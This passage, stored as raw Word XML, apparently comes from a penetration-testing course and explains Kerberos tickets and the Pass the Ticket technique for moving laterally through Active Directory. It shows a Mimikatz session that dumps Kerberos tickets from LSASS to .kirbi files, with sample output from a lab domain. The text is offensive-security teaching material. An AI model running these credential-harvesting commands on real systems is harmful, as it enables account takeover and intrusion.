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6F613B" wp14:paraId="75C20598" wp14:textId="1702F157">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Pass the Ticket (PtT) from Windows</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="1DC5B602" wp14:textId="765D5B28">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Another method for moving laterally in an Active Directory environment is called a </w:t>
      </w:r>
      <w:hyperlink r:id="Rf8d80f08a5b143d7">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>Pass the Ticket (PtT) attack</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>. In this attack, we use a stolen Kerberos ticket to move laterally instead of an NTLM password hash. We'll cover several ways to perform a PtT attack from Windows and Linux. In this section, we'll focus on Windows attacks, and in the following section, we'll cover attacks from Linux.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="721D4C30" wp14:textId="47E59489"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="608A66BC" wp14:textId="40369638">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Kerberos Protocol Refresher</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="7D5FD007" wp14:textId="427B824D">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>The Kerberos authentication system is ticket-based. The central idea behind Kerberos is not to give an account password to every service you use. Instead, Kerberos keeps all tickets on your local system and presents each service only the specific ticket for that service, preventing a ticket from being used for another purpose.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="062D375C" wp14:textId="6010217F">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1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>The TGT - Ticket Granting Ticket is the first ticket obtained on a Kerberos system. The TGT permits the client to obtain additional Kerberos tickets or TGS.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="24A67D20" wp14:textId="6380691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1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>The TGS - Ticket Granting Service is requested by users who want to use a service. These tickets allow services to verify the user's identity.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="2F030571" wp14:textId="60DC7C87">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>When a user requests a TGT, they must authenticate to the domain controller by encrypting the current timestamp with their password hash. Once the domain controller validates the user's identity (because the domain knows the user's password hash, meaning it can decrypt the timestamp), it sends the user a TGT for future requests. Once the user has their ticket, they do not have to prove who they are with their password.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="294B010C" wp14:textId="6373B18B">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>If the user wants to connect to an MSSQL database, it will request a Ticket Granting Service (TGS) to The Key Distribution Center (KDC), presenting its Ticket Granting Ticket (TGT). Then it will give the TGS to the MSSQL database server for authentication.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="1A8A8C2D" wp14:textId="51832E25">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">It's recommended to take a look at the </w:t>
      </w:r>
      <w:hyperlink r:id="R382b2db02d6848f5">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>Kerberos, DNS, LDAP, MSRPC</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> section in the module </w:t>
      </w:r>
      <w:hyperlink r:id="R0cf0c738dc044f3b">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>Introduction to Active Directory</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a high-level overview of how this protocol works.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="239DD739" wp14:textId="7EED2B78"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="03FDDB19" wp14:textId="761E36CE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Pass the Ticket (PtT) Attack</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="17EEFA4C" wp14:textId="11886600">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>We need a valid Kerberos ticket to perform a Pass the Ticket (PtT). It can be:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="3F324E13" wp14:textId="4083F6AC">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1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Service Ticket (TGS - Ticket Granting Service) to allow access to a particular resource.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="077E350F" wp14:textId="4675AF83">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1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Ticket Granting Ticket (TGT), which we use to request service tickets to access any resource the user has privileges.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="2D57D681" wp14:textId="1282CB58">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Before we perform a Pass the Ticket (PtT) attack, let's see some methods to get a ticket using Mimikatz and Rubeus.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="6960D7AA" wp14:textId="22DE08F2"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="7CBEB80C" wp14:textId="2494B1A7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Scenario</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="63C16D07" wp14:textId="505BF3D2">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Let's imagine we are on a pentest, and we manage to phish a user and gain access to the user's computer. We found a way to obtain administrative privileges on this computer and are working with local administrator rights. Let's explore several ways we can manage to get access tickets on this computer and how we can create new tickets.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="47B009B3" wp14:textId="0E6DAEEB"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="5E648722" wp14:textId="22F08DB6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Harvesting Kerberos Tickets from Windows</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="719C0560" wp14:textId="3391FEFE">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>On Windows, tickets are processed and stored by the LSASS (Local Security Authority Subsystem Service) process. Therefore, to get a ticket from a Windows system, you must communicate with LSASS and request it. As a non-administrative user, you can only get your tickets, but as a local administrator, you can collect everything.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="2ABEFAD1" wp14:textId="227AB414">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>We can harvest all tickets from a system using the Mimikatz module sekurlsa::tickets /export. The result is a list of files with the extension .kirbi, which contain the tickets.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="4EEC27E9" wp14:textId="7CB9137A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Mimikatz - Export Tickets</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="1A6F613B" wp14:paraId="5FA60D72" wp14:textId="49A701B8">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06664A8C" wp14:textId="78D3E629">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mimikatz.exe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mimikatz 2.2.0 (x64) #19041 Aug  6 2020 14:53:43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"A La Vie, A L'Amour" - (oe.eo)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 Benjamin DELPY `gentilkiwi` ( </w:t>
      </w:r>
      <w:hyperlink r:id="R09024bfafd954f89">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>benjamin@gentilkiwi.com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&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="Re6c0e06ed4a242b8">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://blog.gentilkiwi.com/mimikatz</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v ##'       Vincent LE TOUX             ( </w:t>
      </w:r>
      <w:hyperlink r:id="R4d3121c81e784d9b">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>vincent.letoux@gmail.com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&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="Red3f3c6331724a6f">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://pingcastle.com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w:t>
      </w:r>
      <w:hyperlink r:id="Rd10b7a0153cd4dc4">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://mysmartlogon.com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privilege::debug</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Privilege '20'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sekurlsa::tickets /export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Authentication Id : 0 ; 329278 (00000000:0005063e)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Session           : Network from 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>User Name         : DC01$</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Domain            : HTB</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Logon Server      : (null)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Logon Time        : 7/12/2022 9:39:55 AM</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>SID               : S-1-5-18</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Username : DC01$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Domain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Password : (null)</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Group 0 - Ticket Granting Service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Group 1 - Client Ticket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[00000000]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Start/End/MaxRenew: 7/12/2022 9:39:55 AM ; 7/12/2022 7:39:54 PM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 Name (02) : LDAP ; DC01.inlanefreight.htb ; inlanefreight.htb ;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Target Name  (--) :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Client Name  (01) : DC01$ ;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40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable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Session Key       : 0x00000012 - aes256_hmac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31cfa427a01e10f6e09492f2e8ddf7f74c79a5ef6b725569e19d614a35a69c07</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Ticket            : 0x00000012 - aes256_hmac       ; kvno = 5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Saved to file [</w:t>
      </w:r>
      <w:hyperlink r:id="R0db919aa4b8f4f13">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>0;5063e]-1-0-40a50000-DC01$@LDAP-DC01.inlanefreight.htb.kirbi</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Group 2 - Ticket Granting Ticket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exit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Bye!</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>c:\tools&gt; dir *.kirbi</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Directory: c:\tools</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Mode                LastWriteTime         Length Name</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>----                -------------         ------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-a----        7/12/2022   9:44 AM           1445 [</w:t>
      </w:r>
      <w:hyperlink r:id="R99202a0d68624a88">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi</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-a----        7/12/2022   9:44 AM           1565 [</w:t>
      </w:r>
      <w:hyperlink r:id="Rb6f9632ea0994b9d">
        <w:r w:rsidRPr="1A6F613B" w:rsidR="1A6F613B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="black"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
